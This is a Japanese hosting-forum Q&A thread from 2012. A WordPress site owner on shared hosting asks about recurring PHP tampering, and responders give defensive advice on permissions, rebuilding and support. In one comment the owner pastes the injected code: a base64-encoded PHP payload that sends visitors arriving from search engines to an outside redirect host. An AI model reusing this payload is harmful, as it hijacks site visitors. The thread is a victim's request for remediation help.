『ネットオウルユーザーコミュニティ』の提供に伴い、『Q&A掲示板』は2025年3月31日正午をもって提供を終了します。[関連ニュース]

メンバーメニュー

ようこそ、ゲストさん

トップ > カテゴリ一覧 > ミニバード > phpのコード改ざんについて

質問

  • phpのコード改ざんについて
  • 本文:

    こんにちは。初めまして。

    ミニバードにて、WordPressでHPを公開しているのですが、
    一週間に一度位の割合でphpに不正なコードを埋め込まれてしまいます。。
    これは、WordPressの脆弱性なのか、それとも、
    何かServer設定で対策出来るものなのかを教えていただきたく質問させていただいた次第です。

    当方、初心者でServer設定など詳しくなく、デフォルトで何も設定しておりません。
    やった事と言えば、Serverのメンテログインログインパスワードの変更、Mysqlのユーザーパスワード変更、WordPressユーザーパスワードの変更くらいです。

    何か対策があるのなら、ご教授して頂きたく思い、御相談させていただきました。

    何卒よろしくお願い致します。

  • 緊急度:緊急投稿者:maisonetteさん投稿時間:2012/12/08 19:13
質問に対する回答は締め切られました

回答 No.1263

  • この回答がベストアンサーです

  • 本文:

    多分 index.php にも不正コードが埋め込まれ最悪ローカルPCがGunblarに感染でもしてFTP等のパスワードが抜き取られている可能性も考えられます。バックドアーを仕掛けられ wordpress 自体がクラッキングされているかも知れませんね。

    共用サーバーですから被害が第三者に及ばないためにも常用のPCではなく別のPCから再構築される事をお勧めします。それから常用マシーンの感染チェックが宜しいかと思います。

    パーミッションですがシングルサイトの場合は速攻で .htaccess wp-config.php 444 マルチサイト化の場合は基本形が出来上がった時点で同じパーミッション設定で運用しています。このパーミッションで不都合の経験は無かったはずです。

    ここ迄やっても駄目ならサポートに連絡するか、さっさとサーバ移転するでしょう。netowl 側でもあちこちのレン鯖で改ざん被害が出ているのにアナウンスが無い方が?です。

  • 投稿者:vagabondさん 投稿時間:2012/12/09 01:46
質問者からのコメント

vagabondさん、おはようございます。

たびたび、ご回答ありがとうございます。

常用マシンのウィルスチェック等は常に行っているので大丈夫かと思います。

>パーミッションですがシングルサイトの場合は速攻で .htaccess wp-config.php 444 マルチサイト化の場合は基本形が出来上がった時点で同じパーミッション設定で運用しています。このパーミッションで不都合の経験は無かったはずです。

再度、パスワードの全変更とパーミッションの変更で様子を見ることにしてみます。

これでダメならサーバを移ることも考えます。

本当に、何度もありがとうございました。m(_ _)m

回答 No.1261

  • 本文:

    遂に minibird にも改ざん被害がでましたか。時間の問題と思っていましたが。

    改ざん被害に関しては諸説が飛び交っています。

    >Serverのメンテログインログインパスワードの変更、Mysqlのユーザーパスワード変更、WordPressユーザーパスワードの変更くらいです。

    必要な措置でしょう。

    *PHP の脆弱性をつくものならnetowl の企業努力に期待。

    *プラグインの脆弱性は利用者が使用しないものは極力削除。本家以外で配布されている物の使用には要注意。

    *テェーマの脆弱性もしかり。外国物のテェーマでは必ず footer.php をチェック。謎の文字列が乱舞していないか。

    *.htaccess wp-config.php パーミッションを低く設定。


    どのような被害か分かりませんが .htaccess に見覚えの無い記述が存在していませんか?

  • 投稿者:vagabondさん 投稿時間:2012/12/08 21:17
質問者からのコメント

vagabondさん、こんばんは。
早々のお返事、大変ありがとうございます。

>*プラグインの脆弱性は利用者が使用しないものは極力削除。本家以外で配布されている物の使用には要注意。
プラグインの脆弱性ですか。。。一度全て削除してみます。

>*.htaccess wp-config.php パーミッションを低く設定。
なるほど、こちらの対策もしてみます。

ちなみに、埋め込まれたコードは
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9kZW52ZXIuZHVtYjEuY29tLyIpOw0KZXhpdCgpOw0KfQp9Cn0NCn0NCn0="));

で、wordpressをインストールしたフォルダ(サブフォルダも含め)の、*.phpファイルの中の『<?php』の次に埋め込まれています。
grepすると、約500件程見つかります。。
ネットで検索しても、他の方もこのコードで被害にあわれている様子です。。。

>*テェーマの脆弱性もしかり。外国物のテェーマでは必ず footer.php をチェック。謎の文字列が乱舞していないか。

fotter.phpにはコピーライト以外にとくにはありません。

.htaccessに見覚えのない記述はないと思います。。

netowlさんの努力でなんとかしてもらえるならしてもらいたいです!

本当に困り果てています。。。

回答 No.1262

  • 本文:

    大変な状況の様ですね

    .htaccess の件ですが改行を重ねとんでもないところに記述される場合がある様です。

    wp-config.php にeval(base64_decode の記述はありませんか?

    パーミッションは幾つで設定されいてますか?

    状況から考えてwordpress 全削除して再構築でしょうか。私は wordpress 一辺倒で マルチサイト2カ所 netowl で運営してましたが .htaccess wp-config.php のパーミッションで被害にあっていません。

  • 投稿者:vagabondさん 投稿時間:2012/12/08 23:15
質問者からのコメント

vagabondさん、こんばんは。

>wp-config.php にeval(base64_decode の記述はありませんか?
もちろん、<?phpの後にはそのコードが埋め込まれております。。。

>パーミッションは幾つで設定されいてますか?
.htaccess、wp-config.php共に604です。

何か、不正なファイルが既にアップロードされていて、定期的に実行されているのでしょうかね。。。

回答 No.1264

  • 本文:

    WordPress改ざんについてはWordPress公式フォーラムの方が的確なアドバイスが受けられると思います。
    http://ja.forums.wordpress.org/

    また、WordPress公式ドキュメントも御覧ください。
    http://wpdocs.sourceforge.jp/FAQ/%E3%83%8F%E3%83%83%E3%82%AD%E3%83%B3%E3%82%B0%E3%83%BB%E3%82%AF%E3%83%A9%E3%83%83%E3%82%AD%E3%83%B3%E3%82%B0%E8%A2%AB%E5%AE%B3

    共用サーバーなため、同じサーバーを使用している他の人にも被害が及んでしまう危険がありますので、サポセン側にも連絡しておいたほうがいいと思います。
    http://www.minibird.jp/support/support.php

  • 投稿者:たくさん 投稿時間:2012/12/09 16:08
質問者からのコメント

たくさんさん、こんばんは。
お返事が遅れて大変申し訳ありません。

wordpressの公式フォーラムですね。ありがとうございます。一度こちらで、過去ログを見て、なければ質問してみようと思います。

公式ドキュメントも、まだ目を通していないので、確認してみます。

ネットオウルのサポートセンターへも同時に問い合わせ、報告しておきます。

アドバイス大変ありがとうございます。